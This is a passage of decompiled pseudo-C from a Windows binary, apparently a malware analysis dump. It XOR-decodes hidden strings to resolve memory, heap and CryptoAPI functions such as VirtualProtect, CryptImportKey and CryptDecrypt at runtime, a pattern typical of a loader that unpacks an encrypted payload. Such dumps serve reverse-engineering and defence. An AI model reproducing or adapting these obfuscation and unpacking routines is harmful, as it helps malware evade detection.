                                                                                                                                                                                                                                				E736D7DE0(_t795, "VirtualProtect", 0, 0x200);
                                                                                                                                                                                                                                				_t709 = 0;
                                                                                                                                                                                                                                				 *0x736eff4c = 0;
                                                                                                                                                                                                                                				_t801 = _t800 + 0xc;
                                                                                                                                                                                                                                				_t519 =  &_v475;
                                                                                                                                                                                                                                				if(_v475 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t519 = _t519 + 1;
                                                                                                                                                                                                                                						_t709 = _t709 + 1;
                                                                                                                                                                                                                                					} while ( *_t519 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t710 = _t709 + 1;
                                                                                                                                                                                                                                				if(_t709 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("VirtualProtect",  &_v475, _t710);
                                                                                                                                                                                                                                					_t801 = _t801 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t711 = 0;
                                                                                                                                                                                                                                				_t520 =  &_v455;
                                                                                                                                                                                                                                				if(_v455 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t520 = _t520 + 1;
                                                                                                                                                                                                                                						_t711 = _t711 + 1;
                                                                                                                                                                                                                                					} while ( *_t520 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t712 = _t711 + 1;
                                                                                                                                                                                                                                				if(_t711 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("KERNEL32.dll",  &_v455, _t712);
                                                                                                                                                                                                                                					_t801 = _t801 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v419 = 0;
                                                                                                                                                                                                                                				_v415 = 0x2150272;
                                                                                                                                                                                                                                				_v411 = 0x7e740b7c;
                                                                                                                                                                                                                                				_v407 = 0x202b2317;
                                                                                                                                                                                                                                				_v403 = 0x4c474739;
                                                                                                                                                                                                                                				if(_v419 == 0) {
                                                                                                                                                                                                                                					_t790 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t801 + 0xbc + _t790 * 4) =  *(_t801 + 0xbc + _t790 * 4) ^ 0x4c474739;
                                                                                                                                                                                                                                						_t790 = _t790 + 1;
                                                                                                                                                                                                                                					} while (_t790 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v439 = 0;
                                                                                                                                                                                                                                				_v435 = 0x5b9ae549;
                                                                                                                                                                                                                                				_v431 = 0x7e84ed6a;
                                                                                                                                                                                                                                				_v427 = 0x569ae96a;
                                                                                                                                                                                                                                				_v423 = 0x2fe88c1f;
                                                                                                                                                                                                                                				if(_v439 == 0) {
                                                                                                                                                                                                                                					_t789 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t801 + 0xa8 + _t789 * 4) =  *(_t801 + 0xa8 + _t789 * 4) ^ 0x2fe88c1f;
                                                                                                                                                                                                                                						_t789 = _t789 + 1;
                                                                                                                                                                                                                                					} while (_t789 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7DE0(_t795, "VirtualQuery", 0, 0x200);
                                                                                                                                                                                                                                				_t713 = 0;
                                                                                                                                                                                                                                				 *0x736f0150 = 0;
                                                                                                                                                                                                                                				_t802 = _t801 + 0xc;
                                                                                                                                                                                                                                				_t524 =  &_v435;
                                                                                                                                                                                                                                				if(_v435 != 0) {
                                                                                                                                                                                                                                					asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t524 = _t524 + 1;
                                                                                                                                                                                                                                						_t713 = _t713 + 1;
                                                                                                                                                                                                                                					} while ( *_t524 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t714 = _t713 + 1;
                                                                                                                                                                                                                                				if(_t713 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("VirtualQuery",  &_v435, _t714);
                                                                                                                                                                                                                                					_t802 = _t802 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t715 = 0;
                                                                                                                                                                                                                                				_t525 =  &_v415;
                                                                                                                                                                                                                                				if(_v415 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t525 = _t525 + 1;
                                                                                                                                                                                                                                						_t715 = _t715 + 1;
                                                                                                                                                                                                                                					} while ( *_t525 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t716 = _t715 + 1;
                                                                                                                                                                                                                                				if(_t715 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("KERNEL32.dll",  &_v415, _t716);
                                                                                                                                                                                                                                					_t802 = _t802 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v399 = 0;
                                                                                                                                                                                                                                				_v395 = 0x40b17d1a;
                                                                                                                                                                                                                                				_v391 = 0x3cd07414;
                                                                                                                                                                                                                                				_v387 = 0x628f5c7f;
                                                                                                                                                                                                                                				_v383 = 0xee33851;
                                                                                                                                                                                                                                				if(_v399 == 0) {
                                                                                                                                                                                                                                					_t788 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t802 + 0xd0 + _t788 * 4) =  *(_t802 + 0xd0 + _t788 * 4) ^ 0x0ee33851;
                                                                                                                                                                                                                                						_t788 = _t788 + 1;
                                                                                                                                                                                                                                					} while (_t788 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v599 = 0;
                                                                                                                                                                                                                                				_v595 = 0x2fe68666;
                                                                                                                                                                                                                                				_v591 = 0x1df88e45;
                                                                                                                                                                                                                                				_v587 = 0x5bf18a42;
                                                                                                                                                                                                                                				if(_v599 == 0) {
                                                                                                                                                                                                                                					_t787 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t802 + 8 + _t787 * 4) =  *(_t802 + 8 + _t787 * 4) ^ 0x5b94ef30;
						_t787 = _t787 + 1;
					} while (_t787 < 3);
				}
				E736D7DE0(_t795, "VirtualFree", 0, 0x200);
				_t717 = 0;
				 *0x736f0354 = 0;
				_t803 = _t802 + 0xc;
				_t529 =  &_v595;
				if(_v595 != 0) {
					do {
						_t529 = _t529 + 1;
						_t717 = _t717 + 1;
					} while ( *_t529 != 0);
				}
				_t718 = _t717 + 1;
				if(_t717 + 1 != 0) {
					E736D82C0("VirtualFree",  &_v595, _t718);
					_t803 = _t803 + 0xc;
				}
				_t719 = 0;
				_t530 =  &_v395;
				if(_v395 != 0) {
					do {
						_t530 = _t530 + 1;
						_t719 = _t719 + 1;
					} while ( *_t530 != 0);
				}
				_t720 = _t719 + 1;
				if(_t719 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_v395, _t720);
					_t803 = _t803 + 0xc;
				}
				_v359 = 0;
				_v355 = 0x6c321b09;
				_v351 = 0x10531207;
				_v347 = 0x4e0c3a6c;
				_v343 = 0x22605e42;
				if(_v359 == 0) {
					_t786 = 0;
					do {
						 *(_t803 + 0xf8 + _t786 * 4) =  *(_t803 + 0xf8 + _t786 * 4) ^ 0x22605e42;
						_t786 = _t786 + 1;
					} while (_t786 < 4);
				}
				_v379 = 0;
				_v375 = 0x37f22890;
				_v371 = 0x2e522a5;
				_v367 = 0x2ce3ea4;
				_v363 = 0x67863db6;
				if(_v379 == 0) {
					_t785 = 0;
					do {
						 *(_t803 + 0xe4 + _t785 * 4) =  *(_t803 + 0xe4 + _t785 * 4) ^ 0x67864dd7;
						_t785 = _t785 + 1;
					} while (_t785 < 4);
				}
				E736D7DE0(_t795, "GetProcessHeap", 0, 0x200);
				_t721 = 0;
				 *0x736f0558 = 0;
				_t804 = _t803 + 0xc;
				_t534 =  &_v375;
				if(_v375 != 0) {
					do {
						_t534 = _t534 + 1;
						_t721 = _t721 + 1;
					} while ( *_t534 != 0);
				}
				_t722 = _t721 + 1;
				if(_t721 + 1 != 0) {
					E736D82C0("GetProcessHeap",  &_v375, _t722);
					_t804 = _t804 + 0xc;
				}
				_t723 = 0;
				_t535 =  &_v355;
				if(_v355 != 0) {
					do {
						_t535 = _t535 + 1;
						_t723 = _t723 + 1;
					} while ( *_t535 != 0);
				}
				_t724 = _t723 + 1;
				if(_t723 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_v355, _t724);
					_t804 = _t804 + 0xc;
				}
				_v339 = 0;
				_v335 = 0x536db481;
				_v331 = 0x2f0cbd8f;
				_v327 = 0x715395e4;
				_v323 = 0x1d3ff1ca;
				if(_v339 == 0) {
					_t784 = 0;
					do {
						 *(_t804 + 0x10c + _t784 * 4) =  *(_t804 + 0x10c + _t784 * 4) ^ 0x1d3ff1ca;
						_t784 = _t784 + 1;
					} while (_t784 < 4);
				}
				_v583 = 0;
				_v579 = 0x14ad5a47;
				_v575 = 0xba0534e;
				_v571 = 0x64cc3f6c;
				if(_v583 == 0) {
					_t783 = 0;
					do {
						 *(_t804 + 0x18 + _t783 * 4) =  *(_t804 + 0x18 + _t783 * 4) ^ 0x64cc3f0f;
						_t783 = _t783 + 1;
					} while (_t783 < 3);
				}
				E736D7DE0(_t795, "HeapAlloc", 0, 0x200);
				_t725 = 0;
				 *0x736f075c = 0;
				_t805 = _t804 + 0xc;
				_t539 =  &_v579;
				if(_v579 != 0) {
					do {
						_t539 = _t539 + 1;
						_t725 = _t725 + 1;
					} while ( *_t539 != 0);
				}
				_t726 = _t725 + 1;
				if(_t725 + 1 != 0) {
					E736D82C0("HeapAlloc",  &_v579, _t726);
					_t805 = _t805 + 0xc;
				}
				_t727 = 0;
				_t540 =  &_v335;
				if(_v335 != 0) {
					do {
						_t540 = _t540 + 1;
						_t727 = _t727 + 1;
					} while ( *_t540 != 0);
				}
				_t728 = _t727 + 1;
				if(_t727 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_v335, _t728);
					_t805 = _t805 + 0xc;
				}
				_v319 = 0;
				_v315 = 0xa842660;
				_v311 = 0x76e52f6e;
				_v307 = 0x28ba0705;
				_v303 = 0x44d6632b;
				if(_v319 == 0) {
					_t782 = 0;
					do {
						 *(_t805 + 0x120 + _t782 * 4) =  *(_t805 + 0x120 + _t782 * 4) ^ 0x44d6632b;
						_t782 = _t782 + 1;
                                                                                                                                                                                                                                					} while (_t782 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v567 = 0;
                                                                                                                                                                                                                                				_v563 = 0x217a618e;
                                                                                                                                                                                                                                				_v559 = 0x34616d95;
                                                                                                                                                                                                                                				_v555 = 0x511b04c6;
                                                                                                                                                                                                                                				if(_v567 == 0) {
                                                                                                                                                                                                                                					_t781 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t805 + 0x28 + _t781 * 4) =  *(_t805 + 0x28 + _t781 * 4) ^ 0x511b04c6;
                                                                                                                                                                                                                                						_t781 = _t781 + 1;
                                                                                                                                                                                                                                					} while (_t781 < 3);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7DE0(_t795, "HeapSize", 0, 0x200);
                                                                                                                                                                                                                                				_t729 = 0;
                                                                                                                                                                                                                                				 *0x736f0960 = 0;
                                                                                                                                                                                                                                				_t806 = _t805 + 0xc;
                                                                                                                                                                                                                                				_t544 =  &_v563;
                                                                                                                                                                                                                                				if(_v563 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t544 = _t544 + 1;
                                                                                                                                                                                                                                						_t729 = _t729 + 1;
                                                                                                                                                                                                                                					} while ( *_t544 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t730 = _t729 + 1;
                                                                                                                                                                                                                                				if(_t729 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("HeapSize",  &_v563, _t730);
                                                                                                                                                                                                                                					_t806 = _t806 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t731 = 0;
                                                                                                                                                                                                                                				_t545 =  &_v315;
                                                                                                                                                                                                                                				if(_v315 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t545 = _t545 + 1;
                                                                                                                                                                                                                                						_t731 = _t731 + 1;
                                                                                                                                                                                                                                					} while ( *_t545 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t732 = _t731 + 1;
                                                                                                                                                                                                                                				if(_t731 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("KERNEL32.dll",  &_v315, _t732);
                                                                                                                                                                                                                                					_t806 = _t806 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v299 = 0;
                                                                                                                                                                                                                                				_v295 = 0x386f5c37;
                                                                                                                                                                                                                                				_v291 = 0x440e5539;
                                                                                                                                                                                                                                				_v287 = 0x1a517d52;
                                                                                                                                                                                                                                				_v283 = 0x763d197c;
                                                                                                                                                                                                                                				if(_v299 == 0) {
                                                                                                                                                                                                                                					_t780 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t806 + 0x134 + _t780 * 4) =  *(_t806 + 0x134 + _t780 * 4) ^ 0x763d197c;
                                                                                                                                                                                                                                						_t780 = _t780 + 1;
                                                                                                                                                                                                                                					} while (_t780 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v551 = 0;
                                                                                                                                                                                                                                				_v547 = 0x2769f945;
                                                                                                                                                                                                                                				_v543 = 0x326dee4b;
                                                                                                                                                                                                                                				_v539 = 0x57089c0d;
                                                                                                                                                                                                                                				if(_v551 == 0) {
                                                                                                                                                                                                                                					_t779 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t806 + 0x38 + _t779 * 4) =  *(_t806 + 0x38 + _t779 * 4) ^ 0x57089c0d;
                                                                                                                                                                                                                                						_t779 = _t779 + 1;
                                                                                                                                                                                                                                					} while (_t779 < 3);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7DE0(_t795, "HeapFree", 0, 0x200);
                                                                                                                                                                                                                                				_t733 = 0;
                                                                                                                                                                                                                                				 *0x736f0b64 = 0;
                                                                                                                                                                                                                                				_t807 = _t806 + 0xc;
                                                                                                                                                                                                                                				_t549 =  &_v547;
                                                                                                                                                                                                                                				if(_v547 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t549 = _t549 + 1;
                                                                                                                                                                                                                                						_t733 = _t733 + 1;
                                                                                                                                                                                                                                					} while ( *_t549 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t734 = _t733 + 1;
                                                                                                                                                                                                                                				if(_t733 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("HeapFree",  &_v547, _t734);
                                                                                                                                                                                                                                					_t807 = _t807 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t735 = 0;
                                                                                                                                                                                                                                				_t550 =  &_v295;
                                                                                                                                                                                                                                				if(_v295 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t550 = _t550 + 1;
                                                                                                                                                                                                                                						_t735 = _t735 + 1;
                                                                                                                                                                                                                                					} while ( *_t550 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t736 = _t735 + 1;
                                                                                                                                                                                                                                				if(_t735 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("KERNEL32.dll",  &_v295, _t736);
                                                                                                                                                                                                                                					_t807 = _t807 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v279 = 0;
                                                                                                                                                                                                                                				_v275 = 0x7aa1122f;
                                                                                                                                                                                                                                				_v271 = 0x6c01b21;
                                                                                                                                                                                                                                				_v267 = 0x589f334a;
                                                                                                                                                                                                                                				_v263 = 0x34f35764;
                                                                                                                                                                                                                                				if(_v279 == 0) {
                                                                                                                                                                                                                                					_t778 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t807 + 0x148 + _t778 * 4) =  *(_t807 + 0x148 + _t778 * 4) ^ 0x34f35764;
                                                                                                                                                                                                                                						_t778 = _t778 + 1;
                                                                                                                                                                                                                                					} while (_t778 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v535 = 0;
                                                                                                                                                                                                                                				_v531 = 0x55357ead;
                                                                                                                                                                                                                                				_v527 = 0x49157eb7;
                                                                                                                                                                                                                                				_v523 = 0x25377489;
                                                                                                                                                                                                                                				if(_v535 == 0) {
                                                                                                                                                                                                                                					_t777 = 0;
                                                                                                                                                                                                                                					do {
						 *(_t807 + 0x48 + _t777 * 4) =  *(_t807 + 0x48 + _t777 * 4) ^ 0x25541be5;
						_t777 = _t777 + 1;
					} while (_t777 < 3);
				}
				E736D7DE0(_t795, "HeapReAlloc", 0, 0x200);
				_t737 = 0;
				 *0x736f0d68 = 0;
				_t808 = _t807 + 0xc;
				_t554 =  &_v531;
				if(_v531 != 0) {
					do {
						_t554 = _t554 + 1;
						_t737 = _t737 + 1;
					} while ( *_t554 != 0);
				}
				_t738 = _t737 + 1;
				if(_t737 + 1 != 0) {
					E736D82C0("HeapReAlloc",  &_v531, _t738);
					_t808 = _t808 + 0xc;
				}
				_t739 = 0;
				_t555 =  &_v275;
				if(_v275 != 0) {
					do {
						_t555 = _t555 + 1;
						_t739 = _t739 + 1;
					} while ( *_t555 != 0);
				}
				_t740 = _t739 + 1;
				if(_t739 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_v275, _t740);
					_t808 = _t808 + 0xc;
				}
				_v259 = 0;
				_v255 = 0x290f8965;
				_v251 = 0x7a4a8454;
				_v247 = 0x2415890a;
				_v243 = 0x4879ed24;
				if(_v259 == 0) {
					_t776 = 0;
					do {
						 *(_t808 + 0x15c + _t776 * 4) =  *(_t808 + 0x15c + _t776 * 4) ^ 0x4879ed24;
						_t776 = _t776 + 1;
					} while (_t776 < 4);
				}
				_v31 = 0;
				_v27 = 0x2397147f;
				_v23 = 0x228d2748;
				_v19 = 0x369c0f49;
				_v15 = 0x2780097f;
				_v11 = 0x129a1e59;
				_v7 = 0x53ee663c;
				if(_v31 == 0) {
					_t775 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t808 + 0x240 + _t775 * 4) =  *(_t808 + 0x240 + _t775 * 4) ^ 0x53ee663c;
						_t775 = _t775 + 1;
					} while (_t775 < 6);
				}
				E736D7DE0(_t795, "CryptAcquireContextA", 0, 0x200);
				_t741 = 0;
				 *0x736f0f6c = 0;
				_t809 = _t808 + 0xc;
				_t559 =  &_v27;
				if(_v27 != 0) {
					do {
						_t559 = _t559 + 1;
						_t741 = _t741 + 1;
					} while ( *_t559 != 0);
				}
				_t742 = _t741 + 1;
				if(_t741 + 1 != 0) {
					E736D82C0("CryptAcquireContextA",  &_v27, _t742);
					_t809 = _t809 + 0xc;
				}
				_t743 = 0;
				_t560 =  &_v255;
				if(_v255 != 0) {
					do {
						_t560 = _t560 + 1;
						_t743 = _t743 + 1;
					} while ( *_t560 != 0);
				}
				_t744 = _t743 + 1;
				if(_t743 + 1 != 0) {
					E736D82C0("Advapi32.dll",  &_v255, _t744);
					_t809 = _t809 + 0xc;
				}
				_v219 = 0;
				_v215 = 0x37ec02a5;
				_v211 = 0x64a90f94;
				_v207 = 0x3af602ca;
				_v203 = 0x569a66e4;
				if(_v219 == 0) {
					_t774 = 0;
					do {
						 *(_t809 + 0x184 + _t774 * 4) =  *(_t809 + 0x184 + _t774 * 4) ^ 0x569a66e4;
						_t774 = _t774 + 1;
					} while (_t774 < 4);
				}
				_v239 = 0;
				_v235 = 0x4cc6a43f;
				_v231 = 0x4cd29f08;
				_v227 = 0x77cba413;
				_v223 = 0x3cbfaf19;
				if(_v239 == 0) {
					_t773 = 0;
					do {
						 *(_t809 + 0x170 + _t773 * 4) =  *(_t809 + 0x170 + _t773 * 4) ^ 0x3cbfd67c;
						_t773 = _t773 + 1;
					} while (_t773 < 4);
				}
				E736D7DE0(_t795, "CryptImportKey", 0, 0x200);
				_t745 = 0;
				 *0x736f1170 = 0;
				_t810 = _t809 + 0xc;
				_t564 =  &_v235;
				if(_v235 != 0) {
					asm("o16 nop [eax+eax]");
					do {
						_t564 = _t564 + 1;
						_t745 = _t745 + 1;
					} while ( *_t564 != 0);
				}
				_t746 = _t745 + 1;
				if(_t745 + 1 != 0) {
					E736D82C0("CryptImportKey",  &_v235, _t746);
					_t810 = _t810 + 0xc;
				}
				_t747 = 0;
				_t565 =  &_v215;
				if(_v215 != 0) {
					do {
						_t565 = _t565 + 1;
						_t747 = _t747 + 1;
					} while ( *_t565 != 0);
				}
				_t748 = _t747 + 1;
				if(_t747 + 1 != 0) {
					E736D82C0("Advapi32.dll",  &_v215, _t748);
					_t810 = _t810 + 0xc;
				}
				_v199 = 0;
				_v195 = 0x2434a20a;
				_v191 = 0x7771af3b;
				_v187 = 0x292ea265;
				_v183 = 0x4542c64b;
                                                                                                                                                                                                                                				if(_v199 == 0) {
                                                                                                                                                                                                                                					_t772 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t810 + 0x198 + _t772 * 4) =  *(_t810 + 0x198 + _t772 * 4) ^ 0x4542c64b;
                                                                                                                                                                                                                                						_t772 = _t772 + 1;
                                                                                                                                                                                                                                					} while (_t772 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v79 = 0;
                                                                                                                                                                                                                                				_v75 = 0x42a070fe;
                                                                                                                                                                                                                                				_v71 = 0x46bc51c9;
                                                                                                                                                                                                                                				_v67 = 0x62a067f6;
                                                                                                                                                                                                                                				_v63 = 0x5fb870dc;
                                                                                                                                                                                                                                				_v59 = 0x32d902bd;
                                                                                                                                                                                                                                				if(_v79 == 0) {
                                                                                                                                                                                                                                					_t771 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t810 + 0x210 + _t771 * 4) =  *(_t810 + 0x210 + _t771 * 4) ^ 0x32d902bd;
                                                                                                                                                                                                                                						_t771 = _t771 + 1;
                                                                                                                                                                                                                                					} while (_t771 < 5);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7DE0(_t795, "CryptSetKeyParam", 0, 0x200);
                                                                                                                                                                                                                                				_t749 = 0;
                                                                                                                                                                                                                                				 *0x736f1374 = 0;
                                                                                                                                                                                                                                				_t811 = _t810 + 0xc;
                                                                                                                                                                                                                                				_t569 =  &_v75;
                                                                                                                                                                                                                                				if(_v75 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t569 = _t569 + 1;
                                                                                                                                                                                                                                						_t749 = _t749 + 1;
                                                                                                                                                                                                                                					} while ( *_t569 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t750 = _t749 + 1;
                                                                                                                                                                                                                                				if(_t749 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("CryptSetKeyParam",  &_v75, _t750);
                                                                                                                                                                                                                                					_t811 = _t811 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t751 = 0;
                                                                                                                                                                                                                                				_t570 =  &_v195;
                                                                                                                                                                                                                                				if(_v195 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t570 = _t570 + 1;
                                                                                                                                                                                                                                						_t751 = _t751 + 1;
                                                                                                                                                                                                                                					} while ( *_t570 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t752 = _t751 + 1;
                                                                                                                                                                                                                                				if(_t751 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("Advapi32.dll",  &_v195, _t752);
                                                                                                                                                                                                                                					_t811 = _t811 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v159 = 0;
                                                                                                                                                                                                                                				_v155 = 0x260dcedd;
                                                                                                                                                                                                                                				_v151 = 0x7548c3ec;
                                                                                                                                                                                                                                				_v147 = 0x2b17ceb2;
                                                                                                                                                                                                                                				_v143 = 0x477baa9c;
                                                                                                                                                                                                                                				if(_v159 == 0) {
                                                                                                                                                                                                                                					_t770 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t811 + 0x1c0 + _t770 * 4) =  *(_t811 + 0x1c0 + _t770 * 4) ^ 0x477baa9c;
                                                                                                                                                                                                                                						_t770 = _t770 + 1;
                                                                                                                                                                                                                                					} while (_t770 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v179 = 0;
                                                                                                                                                                                                                                				_v175 = 0x529117ae;
                                                                                                                                                                                                                                				_v171 = 0x418d2199;
                                                                                                                                                                                                                                				_v167 = 0x56981c9f;
                                                                                                                                                                                                                                				_v163 = 0x22e865ed;
                                                                                                                                                                                                                                				if(_v179 == 0) {
                                                                                                                                                                                                                                					_t769 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t811 + 0x1ac + _t769 * 4) =  *(_t811 + 0x1ac + _t769 * 4) ^ 0x22e865ed;
                                                                                                                                                                                                                                						_t769 = _t769 + 1;
                                                                                                                                                                                                                                					} while (_t769 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7DE0(_t795, "CryptDecrypt", 0, 0x200);
                                                                                                                                                                                                                                				_t753 = 0;
                                                                                                                                                                                                                                				 *0x736f1578 = 0;
                                                                                                                                                                                                                                				_t812 = _t811 + 0xc;
                                                                                                                                                                                                                                				_t574 =  &_v175;
                                                                                                                                                                                                                                				if(_v175 != 0) {
                                                                                                                                                                                                                                					asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t574 = _t574 + 1;
                                                                                                                                                                                                                                						_t753 = _t753 + 1;
                                                                                                                                                                                                                                					} while ( *_t574 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t754 = _t753 + 1;
                                                                                                                                                                                                                                				if(_t753 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("CryptDecrypt",  &_v175, _t754);
                                                                                                                                                                                                                                					_t812 = _t812 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t755 = 0;
                                                                                                                                                                                                                                				_t575 =  &_v155;
                                                                                                                                                                                                                                				if(_v155 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t575 = _t575 + 1;
                                                                                                                                                                                                                                						_t755 = _t755 + 1;
                                                                                                                                                                                                                                					} while ( *_t575 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t756 = _t755 + 1;
                                                                                                                                                                                                                                				if(_t755 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("Advapi32.dll",  &_v155, _t756);
                                                                                                                                                                                                                                					_t812 = _t812 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v119 = 0;
                                                                                                                                                                                                                                				_v115 = 0x4f0c909c;
                                                                                                                                                                                                                                				_v111 = 0x1c499dad;
                                                                                                                                                                                                                                				_v107 = 0x421690f3;
                                                                                                                                                                                                                                				_v103 = 0x2e7af4dd;
                                                                                                                                                                                                                                				if(_v119 == 0) {
                                                                                                                                                                                                                                					_t768 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t812 + 0x1e8 + _t768 * 4) =  *(_t812 + 0x1e8 + _t768 * 4) ^ 0x2e7af4dd;
                                                                                                                                                                                                                                						_t768 = _t768 + 1;
                                                                                                                                                                                                                                					} while (_t768 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v139 = 0;
                                                                                                                                                                                                                                				_v135 = 0x77849587;
                                                                                                                                                                                                                                				_v131 = 0x7498a3b0;
                                                                                                                                                                                                                                				_v127 = 0x7e9295b0;
                                                                                                                                                                                                                                				_v123 = 0x784828f;
                                                                                                                                                                                                                                				if(_v139 == 0) {
                                                                                                                                                                                                                                					_t767 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t812 + 0x1d4 + _t767 * 4) =  *(_t812 + 0x1d4 + _t767 * 4) ^ 0x07fde7c4;
                                                                                                                                                                                                                                						_t767 = _t767 + 1;
                                                                                                                                                                                                                                					} while (_t767 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7DE0(_t795, "CryptDestroyKey", 0, 0x200);
                                                                                                                                                                                                                                				_t757 = 0;
                                                                                                                                                                                                                                				 *0x736f177c = 0;
                                                                                                                                                                                                                                				_t813 = _t812 + 0xc;
                                                                                                                                                                                                                                				_t579 =  &_v135;
                                                                                                                                                                                                                                				if(_v135 != 0) {
                                                                                                                                                                                                                                					asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t579 = _t579 + 1;
                                                                                                                                                                                                                                						_t757 = _t757 + 1;
                                                                                                                                                                                                                                					} while ( *_t579 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t758 = _t757 + 1;
                                                                                                                                                                                                                                				if(_t757 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("CryptDestroyKey",  &_v135, _t758);
                                                                                                                                                                                                                                					_t813 = _t813 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t759 = 0;
                                                                                                                                                                                                                                				_t580 =  &_v115;
                                                                                                                                                                                                                                				if(_v115 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t580 = _t580 + 1;
                                                                                                                                                                                                                                						_t759 = _t759 + 1;
                                                                                                                                                                                                                                					} while ( *_t580 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t760 = _t759 + 1;
                                                                                                                                                                                                                                				if(_t759 + 1 != 0) {
